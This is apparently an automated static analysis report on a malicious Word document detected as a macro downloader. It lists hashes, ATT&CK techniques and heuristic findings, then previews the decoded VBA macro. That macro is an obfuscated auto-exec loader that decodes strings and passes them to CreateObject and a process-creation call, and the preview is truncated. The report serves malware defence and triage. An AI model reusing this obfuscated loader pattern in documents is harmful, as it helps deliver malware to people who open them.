Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b7dd321cbe09edbd…

MALICIOUS

Office (OLE)

207.7 KB Created: 2019-11-25 19:55:00 Authoring application: Microsoft Office Word First seen: 2020-05-25
MD5: d6ecc5fc8fe605fe7eee99795fe61fad SHA-1: 5d4a4d673d08fb0397c2d3fc0e709ca4fa31f20d SHA-256: b7dd321cbe09edbd3cdaa5abe8a1dd478971de12cc1dafe7c6adf584e4232c72
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1140 Deobfuscate or Reverse Engineer

The sample is a malicious Office document containing obfuscated VBA macros. Heuristics indicate an auto-exec loader that uses CreateObject and execution sink functions, suggesting it attempts to download and run a secondary payload. The ClamAV detection 'Doc.Downloader.Mruk-7410213-0' further supports this downloader functionality.

Heuristics 8

  • ClamAV: Doc.Downloader.Mruk-7410213-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Mruk-7410213-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 31070 bytes
SHA-256: 5b959862ced805daba67a8bbb620fef1c3c8c0bd4b0594d6f7ea12887fa5d60f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Plminrroij"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Bedbmetiphn, 0, 0, MSForms, TextBox"
Attribute VB_Control = "Kdntidminmmb, 1, 1, MSForms, TextBox"
Attribute VB_Control = "Hiooyrrza, 2, 2, MSForms, TextBox"
Attribute VB_Control = "Asihurrliw, 3, 3, MSForms, TextBox"

Attribute VB_Name = "Pqnakdsrwg"
Attribute VB_Base = "0{BFE28C8D-6FFB-4CF4-8C63-EBF97326A9A9}{51846F77-B8C4-4179-B252-8EC9EE163449}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Rybrniykr"
Function Doyjtckglco()
On Error Resume Next
   'Zlcfqohbmwnv
Cghdwlgus = 16338 + 1
      Dim vwzHEZAO()
ReDim vwzHEZAO(2)
vwzHEZAO(0) = "Debitis."
vwzHEZAO(1) = "Velit."

      While 16338 = Cghdwlgus
         Dim bYMhr()
ReDim bYMhr(1)
bYMhr(0) = WuhiAI

      Wend
      Dim SzwEB()
ReDim SzwEB(3)
SzwEB(0) = Rose
SzwEB(1) = "Voluptatibus."
SzwEB(2) = 6436

'Vxqcofpcyghct
Nmgknsjgwpur = Ceponadx(Pqnakdsrwg.Imamnwrpc)
   'Hkutitgtqad
Cghdwlgus = 16338 + 1
      Dim JemBhk()
ReDim JemBhk(3)
JemBhk(0) = "Tempore."
JemBhk(1) = Tom
JemBhk(2) = DFHHfGEX

      While 16338 = Cghdwlgus
         Dim yELHIO()
ReDim yELHIO(2)
yELHIO(0) = 4
yELHIO(1) = "Est."

      Wend
      Dim iCZrAEHAo()
ReDim iCZrAEHAo(3)
iCZrAEHAo(0) = Edmond
iCZrAEHAo(1) = LYKQELt
iCZrAEHAo(2) = "Sunt."

'Vbccrojnum
Set Uppjaowwgmpt = CreateObject(Ceponadx(Pqnakdsrwg.Imamnwrpc + Plminrroij.Kdntidminmmb + Plminrroij.Hiooyrrza))
   'Pmazepzuiaaud
Cghdwlgus = 16338 + 1
      Dim HoOeAaJ()
ReDim HoOeAaJ(3)
HoOeAaJ(0) = "Consectetur minima."
HoOeAaJ(1) = reGjDWJll
HoOeAaJ(2) = gBKtCeADH

      While 16338 = Cghdwlgus
         Dim epLqsj()
ReDim epLqsj(2)
epLqsj(0) = hnQAkMAH
epLqsj(1) = raIaKIfl

      Wend
      Dim rkUwAIvCJ()
ReDim rkUwAIvCJ(1)
rkUwAIvCJ(0) = szueEI

'Dkuessduut
Uppjaowwgmpt.XSize = Joqxdezkb + Eitxoymqstg + Mzwgtinob
   'Ormvxqdogri
Cghdwlgus = 16338 + 1
      Dim qlRfB()
ReDim qlRfB(1)
qlRfB(0) = "Ratione."

      While 16338 = Cghdwlgus
         Dim YVwlMEQJ()
ReDim YVwlMEQJ(2)
YVwlMEQJ(0) = "Nisi odit cum."
YVwlMEQJ(1) = PndVDGJJe

      Wend
      Dim QLUupiFiD()
ReDim QLUupiFiD(2)
QLUupiFiD(0) = aZwBmDF
QLUupiFiD(1) = Clayton

'Bttukgghn
Uppjaowwgmpt.YSize = Xlmjbrjfwmsp + Icrvbodmkl + Tqswccqza
   'Oikpynlv
Cghdwlgus = 16338 + 1
      Dim bREZRgF()
ReDim bREZRgF(2)
bREZRgF(0) = "Saepe."
bREZRgF(1) = 89

      While 16338 = Cghdwlgus
         Dim TieRQEv()
ReDim TieRQEv(2)
TieRQEv(0) = "Accusantium."
TieRQEv(1) = "Nesciunt officiis est provident."

      Wend
      Dim YdYJPGFK()
ReDim YdYJPGFK(1)
YdYJPGFK(0) = Cary

'Xproatfyxerlt
Falzlirv = Ceponadx(Plminrroij.Hiooyrrza + Pqnakdsrwg.Ctgnfzsiqh + Pqnakdsrwg.Hqwiyabfbb)
   'Dwdcslycy
Cghdwlgus = 16338 + 1
      Dim NNFxdyb()
ReDim NNFxdyb(1)
NNFxdyb(0) = "Aut."

      While 16338 = Cghdwlgus
         Dim KoVbnFtI()
ReDim KoVbnFtI(1)
KoVbnFtI(0) = "Error."

      Wend
      Dim IwVfJlFBC()
ReDim IwVfJlFBC(1)
IwVfJlFBC(0) = "Magni."

'Qlkgdkraoico
Hhiftklcdvsz = CreateObject(Ceponadx(Nmgknsjgwpur)).Create#(Falzlirv, Cpbjaftuka, Uppjaowwgmpt, Gwtadqkabf)
   'Loqjrauadlbkn
Cghdwlgus = 16338 + 1
      Dim ForADFKv()
ReDim ForADFKv(1)
ForADFKv(0) = 5869

      While 16338 = Cghdwlgus
         Dim wgaZB()
ReDim wgaZB(2)
wgaZB(0) = Ora
wgaZB(1) = 47

      Wend
      Dim TZIhbsN()
ReDim TZIhbsN(2)
TZIhbsN(0) = 88
TZIhbsN(1) = Maxine

'Uggdwxpixbd
End Function

Attribute VB_Name = "Kcdpgksxpo"
Function Ceponadx(Thhwdqqbcnd)
On Error Resume Next
   'Xdsnwqlorsmcu
Cghdwlgus = 16338 + 1
      Dim tPZrBD()
ReDim tPZrBD(3)
tPZrBD(0) = 6
tPZrB
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.